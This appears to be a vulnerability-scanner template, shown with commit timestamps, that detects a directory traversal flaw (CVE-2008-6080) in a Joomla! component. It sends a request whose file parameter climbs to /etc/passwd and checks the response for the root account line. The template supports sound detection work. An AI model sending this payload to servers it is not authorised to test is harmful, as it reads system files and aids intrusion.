2021-09-27 11:02:48 +00:00
id : CVE-2008-6080
info :
name : Joomla! Component ionFiles 4.4.2 - File Disclosure
author : daffainfo
severity : high
description : Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
2021-09-27 12:31:15 +00:00
reference :
2021-09-27 11:02:48 +00:00
- https://www.exploit-db.com/exploits/6809
- https://www.cvedetails.com/cve/CVE-2008-6080
2021-09-27 12:31:15 +00:00
tags : cve,cve2008,joomla,lfi
2021-09-27 11:02:48 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
matchers-condition : and
matchers :
- type : regex
regex :
2022-03-22 08:01:31 +00:00
- "root:.*:0:0:"
2021-09-27 11:02:48 +00:00
- type : status
status :
2021-09-27 12:31:15 +00:00
- 200